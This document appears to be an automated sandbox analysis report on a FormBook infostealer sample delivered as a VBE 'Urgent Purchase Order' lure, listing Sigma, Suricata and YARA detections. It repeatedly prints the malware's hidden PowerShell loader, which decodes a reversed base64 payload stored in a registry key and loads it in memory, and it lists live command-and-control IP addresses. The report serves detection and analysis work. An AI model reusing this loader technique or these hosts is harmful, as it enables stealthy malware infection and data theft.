Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ'), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ'), CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Purchase Order.vbe", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7772, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ'), ProcessId: 3180, ProcessName: powershell.exe

Sigma detected: Script Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 144.91.92.251, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7772, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49721

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\xcopy.exe", CommandLine: "C:\Windows\SysWOW64\xcopy.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\xcopy.exe, NewProcessName: C:\Windows\SysWOW64\xcopy.exe, OriginalFileName: C:\Windows\SysWOW64\xcopy.exe, ParentCommandLine: "C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\IUrm4tIZbI.exe" , ParentImage: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe, ParentProcessId: 6844, ParentProcessName: RNDzmzHPyfZMe3si.exe, ProcessCommandLine: "C:\Windows\SysWOW64\xcopy.exe", ProcessId: 8920, ProcessName: xcopy.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Purchase Order.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Purchase Order.vbe", CommandLine|base64offset|contains: >, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Purchase Order.vbe", ProcessId: 7772, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ'), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ'), CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Purchase Order.vbe", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7772, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ'), ProcessId: 3180, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-14T14:20:44.808602+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	58256	199.59.243.228	80	TCP
2025-03-14T14:21:09.020473+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	58260	8.210.49.139	80	TCP
2025-03-14T14:21:22.188265+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	58264	13.248.169.48	80	TCP
2025-03-14T14:21:39.563917+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	58268	13.248.169.48	80	TCP
2025-03-14T14:21:52.873250+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	58272	162.0.213.94	80	TCP
2025-03-14T14:22:06.753723+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	58276	144.76.229.203	80	TCP
2025-03-14T14:22:20.112898+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	58280	188.114.96.3	80	TCP
2025-03-14T14:22:33.338768+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	58284	3.33.130.190	80	TCP
2025-03-14T14:22:46.728589+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	58288	92.204.40.98	80	TCP
2025-03-14T14:23:38.623924+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	58292	104.21.112.1	80	TCP
2025-03-14T14:23:54.832669+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	58296	13.248.169.48	80	TCP
2025-03-14T14:24:10.849453+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	58300	13.248.169.48	80	TCP
2025-03-14T14:24:24.050488+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	58304	3.33.130.190	80	TCP
2025-03-14T14:24:37.229920+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	58308	13.248.169.48	80	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-14T14:20:44.808602+0100	2855465	1	A Network Trojan was detected	192.168.2.5	58256	199.59.243.228	80	TCP
2025-03-14T14:21:09.020473+0100	2855465	1	A Network Trojan was detected	192.168.2.5	58260	8.210.49.139	80	TCP
2025-03-14T14:21:22.188265+0100	2855465	1	A Network Trojan was detected	192.168.2.5	58264	13.248.169.48	80	TCP
2025-03-14T14:21:39.563917+0100	2855465	1	A Network Trojan was detected	192.168.2.5	58268	13.248.169.48	80	TCP
2025-03-14T14:21:52.873250+0100	2855465	1	A Network Trojan was detected	192.168.2.5	58272	162.0.213.94	80	TCP
2025-03-14T14:22:06.753723+0100	2855465	1	A Network Trojan was detected	192.168.2.5	58276	144.76.229.203	80	TCP
2025-03-14T14:22:20.112898+0100	2855465	1	A Network Trojan was detected	192.168.2.5	58280	188.114.96.3	80	TCP
2025-03-14T14:22:33.338768+0100	2855465	1	A Network Trojan was detected	192.168.2.5	58284	3.33.130.190	80	TCP
2025-03-14T14:22:46.728589+0100	2855465	1	A Network Trojan was detected	192.168.2.5	58288	92.204.40.98	80	TCP
2025-03-14T14:23:38.623924+0100	2855465	1	A Network Trojan was detected	192.168.2.5	58292	104.21.112.1	80	TCP
2025-03-14T14:23:54.832669+0100	2855465	1	A Network Trojan was detected	192.168.2.5	58296	13.248.169.48	80	TCP
2025-03-14T14:24:10.849453+0100	2855465	1	A Network Trojan was detected	192.168.2.5	58300	13.248.169.48	80	TCP
2025-03-14T14:24:24.050488+0100	2855465	1	A Network Trojan was detected	192.168.2.5	58304	3.33.130.190	80	TCP
2025-03-14T14:24:37.229920+0100	2855465	1	A Network Trojan was detected	192.168.2.5	58308	13.248.169.48	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-14T14:21:01.246409+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58257	8.210.49.139	80	TCP
2025-03-14T14:21:03.878423+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58258	8.210.49.139	80	TCP
2025-03-14T14:21:06.473741+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58259	8.210.49.139	80	TCP
2025-03-14T14:21:14.555484+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58261	13.248.169.48	80	TCP
2025-03-14T14:21:17.131044+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58262	13.248.169.48	80	TCP
2025-03-14T14:21:19.644960+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58263	13.248.169.48	80	TCP
2025-03-14T14:21:27.756903+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58265	13.248.169.48	80	TCP
2025-03-14T14:21:30.441463+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58266	13.248.169.48	80	TCP
2025-03-14T14:21:32.936399+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58267	13.248.169.48	80	TCP
2025-03-14T14:21:45.282816+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58269	162.0.213.94	80	TCP
2025-03-14T14:21:47.791301+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58270	162.0.213.94	80	TCP
2025-03-14T14:21:50.316173+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58271	162.0.213.94	80	TCP
2025-03-14T14:21:58.729601+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58273	144.76.229.203	80	TCP
2025-03-14T14:22:01.263206+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58274	144.76.229.203	80	TCP
2025-03-14T14:22:04.195366+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58275	144.76.229.203	80	TCP
2025-03-14T14:22:12.449469+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58277	188.114.96.3	80	TCP
2025-03-14T14:22:15.071376+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58278	188.114.96.3	80	TCP
2025-03-14T14:22:17.581017+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58279	188.114.96.3	80	TCP
2025-03-14T14:22:25.663015+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58281	3.33.130.190	80	TCP
2025-03-14T14:22:28.192591+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58282	3.33.130.190	80	TCP
2025-03-14T14:22:30.783551+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58283	3.33.130.190	80	TCP
2025-03-14T14:22:39.100912+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58285	92.204.40.98	80	TCP
2025-03-14T14:22:41.654214+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58286	92.204.40.98	80	TCP
2025-03-14T14:22:44.158495+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58287	92.204.40.98	80	TCP
2025-03-14T14:22:53.291327+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58289	104.21.112.1	80	TCP
2025-03-14T14:22:55.838171+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58290	104.21.112.1	80	TCP
2025-03-14T14:22:58.396852+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58291	104.21.112.1	80	TCP
2025-03-14T14:23:44.172458+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58293	13.248.169.48	80	TCP
2025-03-14T14:23:46.760793+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58294	13.248.169.48	80	TCP
2025-03-14T14:23:49.279887+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58295	13.248.169.48	80	TCP
2025-03-14T14:24:00.326349+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58297	13.248.169.48	80	TCP
2025-03-14T14:24:03.284678+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58298	13.248.169.48	80	TCP
2025-03-14T14:24:05.725894+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58299	13.248.169.48	80	TCP
2025-03-14T14:24:16.380476+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58301	3.33.130.190	80	TCP
2025-03-14T14:24:18.977574+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58302	3.33.130.190	80	TCP
2025-03-14T14:24:21.489454+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58303	3.33.130.190	80	TCP
2025-03-14T14:24:29.541752+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58305	13.248.169.48	80	TCP
2025-03-14T14:24:32.103547+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58306	13.248.169.48	80	TCP
2025-03-14T14:24:34.656065+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58307	13.248.169.48	80	TCP
2025-03-14T14:24:42.749594+0100	2855464	1	A Network Trojan was detected	192.168.2.5	58309	3.33.130.190	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-14T14:21:19.644960+0100	2856318	1	A Network Trojan was detected	192.168.2.5	58263	13.248.169.48	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Urgent Purchase Order.vbe

Virustotal: Detection: 12%

Perma Link

Yara detected FormBook

Source: Yara match	File source: 13.2.vbc.exe.9b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.vbc.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.3719481348.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3742236502.00000000088B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1556677119.00000000009B0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1563636022.0000000007ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3724227677.0000000003300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3724379961.0000000003350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3726655209.0000000004F20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1563569316.0000000005680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source:	Binary string: C:\Users\admin\Desktop\Files\b 10 02 2025\r\obj\Debug\r.pdb source: powershell.exe, 00000013.00000002.3747287199.00000264A3D68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3760000554.000001D196BF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3724820036.000001A0801B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.3752869787.0000025E92558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.3752191349.0000025E92350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000024.00000002.3749297403.000001681AFD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.3769482999.0000023552108000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.3768807863.00000228AE168000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.3749628672.000001C3BD4D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.3790379244.0000021226A28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.3772579364.0000017622038000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Unexpected node type! Please add aupport for any new parse tree nodes to the AutoParseTreeVisitor class!VB$AnonymousDelegateVB$StateMachinemscorpe.dllCreateICeeFileGenCreateICeeFileGenDestroyICeeFileGenDestroyICeeFileGen%ld.Myalink.dllCreateALinkCreateALinkComImport_VtblGap As Integer.pdbCLSID_CorSymWriter&%s.sdatavector<T> too longS?~ source: RNDzmzHPyfZMe3si.exe, 00000011.00000002.3739542587.000000000647C000.00000004.80000000.00040000.00000000.sdmp, xcopy.exe, 00000012.00000002.3727204863.0000000003A8C000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000002.3727450782.0000000003FEC000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.1851502254.000000001FF0C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\admin\Desktop\Files\b 10 02 2025\b\obj\Debug\b.pdb source: powershell.exe, 00000013.00000002.3746746994.00000264A3B90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: xcopy.pdbUGP source: vbc.exe, 0000000D.00000002.1558397944.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, RNDzmzHPyfZMe3si.exe, 00000011.00000003.1637364094.0000000000AC8000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: vbc.exe, 0000000D.00000002.1561009209.0000000005330000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000012.00000002.3726305608.00000000038CE000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000012.00000002.3726305608.0000000003730000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1564493965.000000000357D000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1557573634.00000000033CC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\admin\Desktop\Files\b 10 02 2025\b\obj\Debug\b.pdbtL source: powershell.exe, 00000013.00000002.3746746994.00000264A3B90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 0000000D.00000002.1561009209.0000000005330000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, xcopy.exe, 00000012.00000002.3726305608.00000000038CE000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000012.00000002.3726305608.0000000003730000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1564493965.000000000357D000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1557573634.00000000033CC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: vbc.pdb source: RNDzmzHPyfZMe3si.exe, 00000011.00000002.3739542587.000000000647C000.00000004.80000000.00040000.00000000.sdmp, xcopy.exe, 00000012.00000002.3727204863.0000000003A8C000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000002.3727450782.0000000003FEC000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.1851502254.000000001FF0C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: xcopy.pdb source: vbc.exe, 0000000D.00000002.1558397944.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, RNDzmzHPyfZMe3si.exe, 00000011.00000003.1637364094.0000000000AC8000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: RNDzmzHPyfZMe3si.exe, 00000011.00000002.3720190542.000000000041F000.00000002.00000001.01000000.00000006.sdmp

Source: C:\Windows\SysWOW64\xcopy.exe

Code function: 18_2_02D6C850 FindFirstFileW,FindNextFileW,FindClose,

18_2_02D6C850

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 4x nop then xor eax, eax	17_2_088D039E
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 4x nop then pop edi	17_2_088CC4B8
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 4x nop then xor eax, eax	18_2_02D59EE0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 4x nop then mov ebx, 00000004h	18_2_035704CF

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:58260 -> 8.210.49.139:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:58260 -> 8.210.49.139:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58263 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.5:58263 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58258 -> 8.210.49.139:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58259 -> 8.210.49.139:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58261 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58265 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58266 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58262 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58270 -> 162.0.213.94:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58271 -> 162.0.213.94:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:58268 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:58268 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58269 -> 162.0.213.94:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58275 -> 144.76.229.203:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:58272 -> 162.0.213.94:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:58272 -> 162.0.213.94:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58277 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58287 -> 92.204.40.98:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58291 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58285 -> 92.204.40.98:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:58284 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:58284 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58286 -> 92.204.40.98:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58290 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:58292 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:58292 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58299 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58297 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58283 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58293 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58289 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:58308 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:58308 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58306 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58302 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58281 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:58304 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:58304 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58309 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58301 -> 3.33.130.190:80
